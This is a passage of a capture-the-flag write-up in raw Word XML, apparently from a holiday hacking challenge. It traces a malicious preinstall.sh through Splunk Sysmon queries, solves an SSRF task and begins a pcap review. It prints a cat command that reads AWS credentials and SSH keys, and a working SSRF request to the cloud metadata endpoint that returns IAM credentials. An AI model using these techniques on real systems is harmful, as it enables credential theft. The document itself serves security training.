      <w:r w:rsidRPr="00FA472C">
        <w:t>Journald:Microsoft-Windows-Sysmon</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00FA472C">
        <w:t xml:space="preserve">/Operational </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00FA472C">
        <w:t>EventCode</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00FA472C">
        <w:t>=3 user=</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00FA472C">
        <w:t>eddie</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00FA472C">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00FA472C">
        <w:t>dest_port</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00FA472C">
        <w:t>=16842</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="26DD2899" w14:textId="77777777" w:rsidR="00FA472C" w:rsidRDefault="00FA472C"/>
    <w:p w14:paraId="38CE07E4" w14:textId="367B4A9C" w:rsidR="006439C8" w:rsidRDefault="006439C8" w:rsidP="00D6316D">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t>Task 7 – How many files were accessed by the suspicious parent process</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="32EA0C67" w14:textId="06546471" w:rsidR="006439C8" w:rsidRDefault="00FA472C">
      <w:r w:rsidRPr="004B1DCF">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Answer:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="006439C8">
        <w:t>6</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="19E7C691" w14:textId="3726B01F" w:rsidR="006439C8" w:rsidRDefault="004B1DCF">
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Process: </w:t>
      </w:r>
      <w:r w:rsidR="00FA472C">
        <w:t>We need to find other items launched by the same parent process.</w:t>
      </w:r>
      <w:r w:rsidR="00131789">
        <w:t xml:space="preserve"> We can use the following search to get more information about the malicious process to get its parent process:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B22DAFA" w14:textId="627A3012" w:rsidR="00131789" w:rsidRDefault="00131789" w:rsidP="00C60537">
      <w:pPr>
        <w:pStyle w:val="CodeIndented"/>
      </w:pPr>
      <w:r w:rsidRPr="00131789">
        <w:t xml:space="preserve">index=main </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00131789">
        <w:t>sourcetype</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00131789">
        <w:t>=</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00131789">
        <w:t>journald</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00131789">
        <w:t xml:space="preserve"> source=</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00131789">
        <w:t>Journald:Microsoft-Windows-Sysmon</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00131789">
        <w:t>/Operational user=</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00131789">
        <w:t>eddie</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00131789">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00131789">
        <w:t>ProcessId</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00131789">
        <w:t>=6791</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="04930081" w14:textId="58E48287" w:rsidR="00131789" w:rsidRDefault="00131789">
      <w:r>
        <w:t xml:space="preserve">The </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>parent_process_id</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> is 6788, so we can search on that to determine what else was accessed via the suspicious parent process:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="517058FF" w14:textId="48D33605" w:rsidR="00131789" w:rsidRDefault="00131789" w:rsidP="00C60537">
      <w:pPr>
        <w:pStyle w:val="CodeIndented"/>
      </w:pPr>
      <w:r w:rsidRPr="00131789">
        <w:t xml:space="preserve">index=main </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00131789">
        <w:t>sourcetype</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00131789">
        <w:t>=</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00131789">
        <w:t>journald</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00131789">
        <w:t xml:space="preserve"> source=</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00131789">
        <w:t>Journald:Microsoft-Windows-Sysmon</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00131789">
        <w:t>/Operational user=</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00131789">
        <w:t>eddie</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00131789">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00131789">
        <w:t>parent_process_id</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00131789">
        <w:t>=6788</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="69CC3C99" w14:textId="3E205FE9" w:rsidR="00131789" w:rsidRDefault="00131789">
      <w:r>
        <w:t>This reveals the following cat command, seen accessing the six files:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B0C4EE6" w14:textId="10996712" w:rsidR="00131789" w:rsidRDefault="00131789" w:rsidP="00C60537">
      <w:pPr>
        <w:pStyle w:val="CodeIndented"/>
      </w:pPr>
      <w:r w:rsidRPr="00131789">
        <w:t>cat /home/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00131789">
        <w:t>eddie</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00131789">
        <w:t>/.</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00131789">
        <w:t>aws</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00131789">
        <w:t>/credentials /home/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00131789">
        <w:t>eddie</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00131789">
        <w:t>/.</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00131789">
        <w:t>ssh</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00131789">
        <w:t>/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00131789">
        <w:t>authorized_keys</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00131789">
        <w:t xml:space="preserve"> /home/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00131789">
        <w:t>eddie</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00131789">
        <w:t>/.</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00131789">
        <w:t>ssh</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00131789">
        <w:t>/config /home/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00131789">
        <w:t>eddie</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00131789">
        <w:t>/.</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00131789">
        <w:t>ssh</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00131789">
        <w:t>/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00131789">
        <w:t>eddie</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00131789">
        <w:t xml:space="preserve"> /home/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00131789">
        <w:t>eddie</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00131789">
        <w:t>/.</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00131789">
        <w:t>ssh</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00131789">
        <w:t>/eddie.pub /home/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00131789">
        <w:t>eddie</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00131789">
        <w:t>/.</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00131789">
        <w:t>ssh</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00131789">
        <w:t>/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00131789">
        <w:t>known_hosts</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="43305D66" w14:textId="3BADA597" w:rsidR="006439C8" w:rsidRPr="006439C8" w:rsidRDefault="006439C8" w:rsidP="00D6316D">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r w:rsidRPr="006439C8">
        <w:t>Task 8 – What is the name of the Bash script that accessed sensitive files and likely exfiltrated them</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0FB67823" w14:textId="3CD8D12F" w:rsidR="006439C8" w:rsidRDefault="00131789">
      <w:r w:rsidRPr="004B1DCF">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Answer:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="004B1DCF" w:rsidRPr="00C60537">
        <w:rPr>
          <w:rStyle w:val="CodeInlineChar"/>
        </w:rPr>
        <w:t>p</w:t>
      </w:r>
      <w:r w:rsidR="006439C8" w:rsidRPr="00C60537">
        <w:rPr>
          <w:rStyle w:val="CodeInlineChar"/>
        </w:rPr>
        <w:t>reinstall.sh</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="30D9A154" w14:textId="6C95FFB3" w:rsidR="00131789" w:rsidRDefault="004B1DCF">
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Process: </w:t>
      </w:r>
      <w:r w:rsidR="00131789">
        <w:t xml:space="preserve">We can use the previous search to pivot off the </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00131789">
        <w:t>parent_process_id</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00131789">
        <w:t xml:space="preserve"> that ran the </w:t>
      </w:r>
      <w:r w:rsidR="00131789" w:rsidRPr="00C60537">
        <w:rPr>
          <w:rStyle w:val="CodeInlineChar"/>
        </w:rPr>
        <w:t>cat</w:t>
      </w:r>
      <w:r w:rsidR="00131789">
        <w:t xml:space="preserve"> command. Instead, we will use it as the </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00131789">
        <w:t>process_id</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00131789">
        <w:t xml:space="preserve"> to see the associated command line:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B7D0B98" w14:textId="7E730AF9" w:rsidR="00131789" w:rsidRDefault="004B1DCF" w:rsidP="00C60537">
      <w:pPr>
        <w:pStyle w:val="CodeIndented"/>
      </w:pPr>
      <w:r w:rsidRPr="004B1DCF">
        <w:t xml:space="preserve">index=main </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="004B1DCF">
        <w:t>sourcetype</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="004B1DCF">
        <w:t>=</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="004B1DCF">
        <w:t>journald</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="004B1DCF">
        <w:t xml:space="preserve"> source=</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="004B1DCF">
        <w:t>Journald:Microsoft-Windows-Sysmon</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="004B1DCF">
        <w:t>/Operational user=</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="004B1DCF">
        <w:t>eddie</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="004B1DCF">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="004B1DCF">
        <w:t>process_id</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="004B1DCF">
        <w:t>=6788</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E78FC41" w14:textId="64DDBFEE" w:rsidR="004B1DCF" w:rsidRDefault="004B1DCF">
      <w:r>
        <w:t xml:space="preserve">From this search, we can see that the </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>ParentCommandLine</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> that launched the </w:t>
      </w:r>
      <w:r w:rsidRPr="00C60537">
        <w:rPr>
          <w:rStyle w:val="CodeInlineChar"/>
        </w:rPr>
        <w:t>cat</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> command was “</w:t>
      </w:r>
      <w:r w:rsidRPr="00C60537">
        <w:rPr>
          <w:rStyle w:val="CodeInlineChar"/>
        </w:rPr>
        <w:t>/bin/bash preinstall.sh</w:t>
      </w:r>
      <w:r>
        <w:t>”</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A18EEB8" w14:textId="100EE130" w:rsidR="004B1DCF" w:rsidRDefault="004B1DCF">
      <w:r>
        <w:t>Alternatively, we could have also looked for common file extensions associated with Bash scripts to find potential candidates:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="25E1B865" w14:textId="3C6B0770" w:rsidR="004B1DCF" w:rsidRDefault="004B1DCF" w:rsidP="00C60537">
      <w:pPr>
        <w:pStyle w:val="CodeIndented"/>
      </w:pPr>
      <w:r w:rsidRPr="004B1DCF">
        <w:t xml:space="preserve">index=main </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="004B1DCF">
        <w:t>sourcetype</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="004B1DCF">
        <w:t>=</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="004B1DCF">
        <w:t>journald</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="004B1DCF">
        <w:t xml:space="preserve"> source=</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="004B1DCF">
        <w:t>Journald:Microsoft-Windows-Sysmon</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="004B1DCF">
        <w:t>/Operational user=</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="004B1DCF">
        <w:t>eddie</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="004B1DCF">
        <w:t xml:space="preserve"> *.</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="004B1DCF">
        <w:t>sh</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="71091A91" w14:textId="2D12AD79" w:rsidR="004B1DCF" w:rsidRDefault="004B1DCF" w:rsidP="00D6316D">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t>Challenge Answer</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6968B0A9" w14:textId="022825A0" w:rsidR="006439C8" w:rsidRPr="006439C8" w:rsidRDefault="006439C8">
      <w:r>
        <w:t xml:space="preserve">After completing the to-do list, Santa says “you’re a </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>whiz</w:t>
      </w:r>
      <w:r>
        <w:t>!”</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="10AD570A" w14:textId="6338115D" w:rsidR="00853B73" w:rsidRDefault="00853B73" w:rsidP="00D6316D">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t>Objective 10 – Now Hiring!</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="08C8EFB0" w14:textId="5E9C15B7" w:rsidR="00853B73" w:rsidRDefault="00E44D4A">
      <w:r>
        <w:t>To solve this challenge, we need to retrieve the access key for the Jack Frost Tower job applications server.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="24FA006C" w14:textId="26629E10" w:rsidR="00E44D4A" w:rsidRDefault="00E44D4A">
      <w:r>
        <w:t xml:space="preserve">With the help of Noxious O. D’or, we can learn a little bit about accessing common API’s and information on platforms like AWS. He also mentions he is concerned about </w:t>
      </w:r>
      <w:r w:rsidR="008D2A0E">
        <w:t>s</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">erver-side request forgery </w:t>
      </w:r>
      <w:r w:rsidR="008D2A0E">
        <w:t xml:space="preserve">(SSRF) </w:t>
      </w:r>
      <w:r>
        <w:t>and the IMDS information we learned about.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="159016E8" w14:textId="77777777" w:rsidR="00E44D4A" w:rsidRDefault="00E44D4A">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>The site, apply.jackfrosttower.com, has an application that requests Name, Email, Phone, Expertise, resume upload, a URL to access and validate your Naughty List Background Investigation report, and additional information.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2445AC6D" w14:textId="77777777" w:rsidR="007D6957" w:rsidRDefault="007D6957">
      <w:r>
        <w:t>I loaded the website in Burp Proxy and began submitting an application to see what the client and server did. After intercepting the first request, it appears that it will be easy to modify the request in Burp repeater after changing around some variables.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="11F0BE4E" w14:textId="305681C4" w:rsidR="00E44D4A" w:rsidRDefault="007D6957">
      <w:r>
        <w:t>Within Burp Proxy’s HTTP history section, I noticed that after an application was submitted, an image was displayed on the success page based on the name submitted in the application. The image itself was broken but appeared to contain information regarding some information about the request and a base64 response.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="12973F42" w14:textId="4A743EAA" w:rsidR="007D6957" w:rsidRDefault="007D6957">
      <w:r>
        <w:t xml:space="preserve">By asking the application to retrieve information from </w:t>
      </w:r>
      <w:r w:rsidRPr="008D2A0E">
        <w:t>http://169.254.169.254</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> instead of the suggested NLBI report URL, the response from the API will be represented in the resulting jpg response to the application submission.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="31A9088B" w14:textId="77777777" w:rsidR="008D2A0E" w:rsidRDefault="004E1C19">
      <w:r>
        <w:t xml:space="preserve">By submitting a request like this: </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C984288" w14:textId="6894DB2C" w:rsidR="004E1C19" w:rsidRDefault="004E1C19" w:rsidP="008D2A0E">
      <w:pPr>
        <w:pStyle w:val="CodeIndented"/>
      </w:pPr>
      <w:r w:rsidRPr="004E1C19">
        <w:t>GET /?inputName=yeet&amp;inputEmail=&amp;inputPhone=&amp;resumeFile=&amp;inputWorkSample=http%3A%2F%2F169.254.169.254%2Flatest%2Fmeta-data%2Fiam%2Fsecurity-credentials%2Fjf-deploy-role&amp;additionalInformation=&amp;submit= HTTP/2</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="213986F8" w14:textId="77777777" w:rsidR="008D2A0E" w:rsidRDefault="008D2A0E"/>
    <w:p w14:paraId="02A2C70F" w14:textId="3CBC5C9B" w:rsidR="004E1C19" w:rsidRDefault="004E1C19">
      <w:r>
        <w:t>We can receive a response containing this:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="18A68A48" w14:textId="77777777" w:rsidR="004E1C19" w:rsidRDefault="004E1C19" w:rsidP="008D2A0E">
      <w:pPr>
        <w:pStyle w:val="CodeIndented"/>
      </w:pPr>
      <w:r>
        <w:t>{</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="48139AFC" w14:textId="77777777" w:rsidR="004E1C19" w:rsidRDefault="004E1C19" w:rsidP="008D2A0E">
      <w:pPr>
        <w:pStyle w:val="CodeIndented"/>
      </w:pPr>
      <w:r>
        <w:tab/>
        <w:t>"Code": "Success",</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="332DA38B" w14:textId="77777777" w:rsidR="004E1C19" w:rsidRDefault="004E1C19" w:rsidP="008D2A0E">
      <w:pPr>
        <w:pStyle w:val="CodeIndented"/>
      </w:pPr>
      <w:r>
        <w:tab/>
        <w:t>"</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>LastUpdated</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>": "2021-05-02T18:50:40Z",</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="78E7D7D8" w14:textId="77777777" w:rsidR="004E1C19" w:rsidRDefault="004E1C19" w:rsidP="008D2A0E">
      <w:pPr>
        <w:pStyle w:val="CodeIndented"/>
      </w:pPr>
      <w:r>
        <w:tab/>
        <w:t>"Type": "AWS-HMAC",</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="71507D31" w14:textId="77777777" w:rsidR="004E1C19" w:rsidRDefault="004E1C19" w:rsidP="008D2A0E">
      <w:pPr>
        <w:pStyle w:val="CodeIndented"/>
      </w:pPr>
      <w:r>
        <w:tab/>
        <w:t>"</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>AccessKeyId</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>": "AKIA5HMBSK1SYXYTOXX6",</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="37DFA73B" w14:textId="77777777" w:rsidR="004E1C19" w:rsidRDefault="004E1C19" w:rsidP="008D2A0E">
      <w:pPr>
        <w:pStyle w:val="CodeIndented"/>
      </w:pPr>
      <w:r>
        <w:tab/>
        <w:t>"</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>SecretAccessKey</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>": "CGgQcSdERePvGgr058r3PObPq3+0CfraKcsLREpX",</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A1F419A" w14:textId="77777777" w:rsidR="004E1C19" w:rsidRDefault="004E1C19" w:rsidP="008D2A0E">
      <w:pPr>
        <w:pStyle w:val="CodeIndented"/>
      </w:pPr>
      <w:r>
        <w:tab/>
        <w:t>"Token": "NR9Sz/7fzxwIgv7URgHRAckJK0JKbXoNBcy032XeVPqP8/tWiR/KVSdK8FTPfZWbxQ==",</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C246924" w14:textId="77777777" w:rsidR="004E1C19" w:rsidRDefault="004E1C19" w:rsidP="008D2A0E">
      <w:pPr>
        <w:pStyle w:val="CodeIndented"/>
      </w:pPr>
      <w:r>
        <w:tab/>
        <w:t>"Expiration": "2026-05-02T18:50:40Z"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7681C83F" w14:textId="16234E7D" w:rsidR="004E1C19" w:rsidRDefault="004E1C19" w:rsidP="008D2A0E">
      <w:pPr>
        <w:pStyle w:val="CodeIndented"/>
      </w:pPr>
      <w:r>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6386BF1D" w14:textId="435EB418" w:rsidR="004E1C19" w:rsidRDefault="004E1C19" w:rsidP="004E1C19"/>
    <w:p w14:paraId="232FE086" w14:textId="6BF61C5D" w:rsidR="004E1C19" w:rsidRPr="004E1C19" w:rsidRDefault="004E1C19" w:rsidP="004E1C19">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">The secret access key is </w:t>
      </w:r>
      <w:r w:rsidRPr="004E1C19">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>CGgQcSdERePvGgr058r3PObPq3+0CfraKcsLREpX</w:t>
      </w:r>
      <w:r w:rsidRPr="004E1C19">
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="23D68B0A" w14:textId="4B694EF5" w:rsidR="00853B73" w:rsidRDefault="00853B73" w:rsidP="00D6316D">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t>Objective 11 – Customer Complaint Analysis</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="494D9D4A" w14:textId="0F3B9EE6" w:rsidR="00853B73" w:rsidRDefault="00843947">
      <w:r>
        <w:t xml:space="preserve">For this challenge, we have to review a </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>pcap</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> and provide the names of three trolls that complained about a guest.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D4BA568" w14:textId="1367442C" w:rsidR="00843947" w:rsidRDefault="00843947">
      <w:r>
        <w:t xml:space="preserve">To start, I opened the </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>pcap</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> in Wireshark and followed the TCP streams to see what kind of data was going in and out of the complaint form application.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7BAEF98A" w14:textId="3447B5FF" w:rsidR="00843947" w:rsidRDefault="00843947">
      <w:r>
        <w:t xml:space="preserve">It appears that most complaints are submitted and contain name, </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>troll_id</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>guest_info</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>, and description parameters.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E1DD526" w14:textId="37849723" w:rsidR="00843947" w:rsidRDefault="00843947">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">There are only a limited number of complaints, so it was possible to flip through them all. There was one submission that stood out; the application appears to be for trolls to submit complaints; however, there is a single complain from Muffy </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>VonDuchess</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> Sebastian that does not fit the same pattern as all the other complaints.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="74A6E9F6" w14:textId="6F4FC03C" w:rsidR="00843947" w:rsidRDefault="00843947">
      <w:r>
        <w:t xml:space="preserve">However, this would be difficult to find in a much bigger </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>pcap</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve">. The challenge notes that there was a human with a non-compliant host. </w:t>
      </w:r>
      <w:r w:rsidR="00B955A0">
        <w:t xml:space="preserve">Specifically, Tinsel </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00B955A0">
        <w:t>Upatree</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00B955A0">
        <w:t xml:space="preserve"> provides information on RFC3514: the Evil Bit in IPv4 headers.</w:t>
      </w:r>
    </w:p>
